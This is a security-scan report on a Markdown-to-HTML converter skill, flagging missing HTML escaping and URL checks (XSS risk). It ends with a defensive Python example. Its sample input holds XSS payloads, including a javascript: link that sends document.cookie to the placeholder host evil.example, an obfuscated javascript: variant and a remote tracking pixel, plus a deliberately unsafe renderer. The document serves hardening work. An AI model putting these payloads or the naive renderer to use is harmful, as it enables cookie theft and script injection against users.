Skill v1.0.0

ClawScan security

Skill 2 · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Benign · Feb 22, 2026, 4:32 PM
Verdict
benign
Confidence
high
Model
gpt-5-mini
Summary
This is a coherent, local Python Markdown→HTML converter that matches its description, but it neither HTML-escapes arbitrary text nor validates link and image URLs, so the HTML it produces can load remote resources or execute script (XSS) if the Markdown comes from an untrusted source.
Guidance
This skill appears to do what it says and runs locally, but treat the generated HTML as potentially unsafe whenever the Markdown is untrusted. Before using it with third-party or user-provided Markdown, do one of the following:
(a) escape raw HTML in the input (html.escape) or sanitize the produced HTML with an allowlist-based sanitizer (e.g. bleach) so that scripts, javascript: URIs and dangerous tags/attributes are removed;
(b) do not open the generated HTML in a browser when the content is untrusted; or
(c) extend the tool to HTML-escape non-code text and to validate, or rewrite to relative paths, every image and link URL.
Note also that images referenced in the Markdown are fetched by the browser when the HTML is opened, which leaks the viewer's IP address and request metadata to the image host. If you need robust CommonMark compliance and XSS protection, prefer a well-maintained Markdown library combined with an HTML sanitizer.

Review Dimensions

Purpose & Capability
ok
Name/description match the provided files: a small, zero-dependency Python tool that converts Markdown to styled HTML with embedded CSS. The code implements the claimed features (headings, lists, links, images, code blocks, etc.), though 'Full Markdown support' is an optimistic claim (the converter is a hand-rolled subset, not a complete CommonMark implementation).
Instruction Scope
concern
SKILL.md and main.py are scoped to reading a file or stdin and producing an HTML file (expected). However, the converter neither HTML-escapes arbitrary non-code text nor validates link and image URLs. User-supplied Markdown can therefore inject raw HTML or create links with javascript: URIs, and the produced HTML can trigger remote resource loads (images) or XSS when opened in a browser. The README does not warn about these risks, and 'self-contained' might be misread as 'no external resource loads' (only the CSS is embedded).
Install Mechanism
ok
No install spec; instruction-only with a single local Python script that uses the standard library. Nothing is downloaded or written beyond the output the script itself creates (the HTML file). Low install risk.
Credentials
ok
No environment variables, credentials, or config paths are requested; proportional and appropriate for a local file conversion utility.
Persistence & Privilege
ok
No persistent or elevated privileges requested. The always flag is false; the skill does not modify other skills or system configuration.
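The Guidance above and the Instruction Scope finding come down to the same two controls: escape everything that is not code, and vet every URL before it becomes an href or src. The block below is an added example and is not the skill's main.py or any ClawHub code: a constructed Python renderer for a small Markdown subset (headings, paragraphs, fenced and inline code, links, images) that applies both controls, beside a deliberately naive naive_inline() that reproduces the flagged pattern. The scheme allowlist, the relative-only rule for images (which addresses the IP-leak caveat), the sample Markdown and the hosts evil.example and tracker.example.net are assumptions made for this illustration.

```python
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" = relative URL (no scheme)
FENCE = "`" * 3   # built at runtime so the sample below cannot close this page's code fence
HEADING_RE = re.compile(r"^(#{1,6})\s+(.*)$")
INLINE_RE = re.compile(
    r"`(?P<code>[^`]+)`"                                   # inline code span
    r"|(?P<img>!)?\[(?P<text>[^\]]*)\]\((?P<url>[^)]*)\)"  # [text](url) or ![alt](url)
)


def safe_url(url: str, relative_only: bool = False) -> "str | None":
    """Return the URL if it may be emitted, else None. Whitespace and C0 controls are
    stripped first so 'java\tscript:' cannot slip past the scheme check; relative_only
    (used for images) also rejects any scheme or host, so nothing remote is fetched."""
    cleaned = "".join(ch for ch in url if not ch.isspace() and ord(ch) >= 0x20)
    try:
        parts = urlsplit(cleaned)
    except ValueError:                     # e.g. a malformed IPv6 literal
        return None
    scheme = parts.scheme.lower()
    if relative_only:
        # browsers treat '\' like '/', so '\\host\x' is a remote reference: reject backslashes
        return None if scheme or parts.netloc or "\\" in cleaned else cleaned
    return cleaned if scheme in SAFE_SCHEMES else None


def naive_inline(raw: str) -> str:
    """Constructed illustration of the pattern the scanner flagged (not the skill's own
    code): text and URL go straight into the HTML with no escaping and no URL check."""
    return INLINE_RE.sub(lambda m: f"<code>{m.group('code')}</code>" if m.group("code") is not None
                         else f'<a href="{m.group("url")}">{m.group("text")}</a>', raw)


def _safe_token(m, allow_remote_images: bool) -> str:
    if m.group("code") is not None:
        return f"<code>{html.escape(m.group('code'))}</code>"
    text = html.escape(m.group("text"))
    is_img = m.group("img") is not None
    url = safe_url(m.group("url"), relative_only=is_img and not allow_remote_images)
    if url is None:
        return text                        # drop the target, keep the visible text
    attr = html.escape(url, quote=True)    # & " ' escaped so the URL cannot break out of the attribute
    return f'<img src="{attr}" alt="{text}">' if is_img else f'<a href="{attr}">{text}</a>'


def render_inline(raw: str, allow_remote_images: bool = False) -> str:
    """Hardened rendering: every non-code character is HTML-escaped, every URL is vetted."""
    out, pos = [], 0
    for m in INLINE_RE.finditer(raw):
        out.append(html.escape(raw[pos:m.start()]))   # plain text between tokens
        out.append(_safe_token(m, allow_remote_images))
        pos = m.end()
    out.append(html.escape(raw[pos:]))
    return "".join(out)


def render(md: str, allow_remote_images: bool = False) -> str:
    """Block pass for a small Markdown subset: headings, paragraphs and fenced code."""
    blocks, para, code, in_code = [], [], [], False

    def flush() -> None:
        if para:
            blocks.append("<p>" + render_inline(" ".join(para), allow_remote_images) + "</p>")
            para.clear()

    for line in md.splitlines():
        if line.startswith(FENCE):
            if in_code:   # closing fence: code is escaped verbatim, never inline-parsed
                blocks.append("<pre><code>" + html.escape("\n".join(code)) + "</code></pre>")
                code.clear()
            else:
                flush()
            in_code = not in_code
        elif in_code:
            code.append(line)
        elif (h := HEADING_RE.match(line)):
            flush()
            level = len(h.group(1))
            blocks.append(f"<h{level}>{render_inline(h.group(2), allow_remote_images)}</h{level}>")
        elif not line.strip():
            flush()
        else:
            para.append(line)
    flush()
    return "\n".join(blocks)


# Constructed sample input carrying each problem the verdict describes (placeholder hosts).
SAMPLE_MD = "\n".join([
    "# Release notes <script>alert(1)</script>",
    "",
    "Click [here](javascript:document.location='//evil.example/?c='+document.cookie)",
    "or [docs](https://example.com/docs).",
    "Also [sneaky](java\tscript:alert%281%29) and `[not a link](javascript:x)`.",
    "",
    "![logo](./logo.png) ![tracker](https://tracker.example.net/pixel.gif)",
    "",
    FENCE, "<b>raw</b> in a fence stays literal", FENCE,
])
```

render(SAMPLE_MD) keeps the visible text of any link whose target fails the check and drops the target; pass allow_remote_images=True only once the Markdown source is trusted. The allowlist is the important design choice: a denylist of javascript: and data: is easily bypassed by other schemes and by encoding tricks, and stripping whitespace and control characters before the check is what defeats the java\tscript: variant. Contrast naive_inline(), which hands both the raw HTML in the heading and the javascript: href straight to the browser.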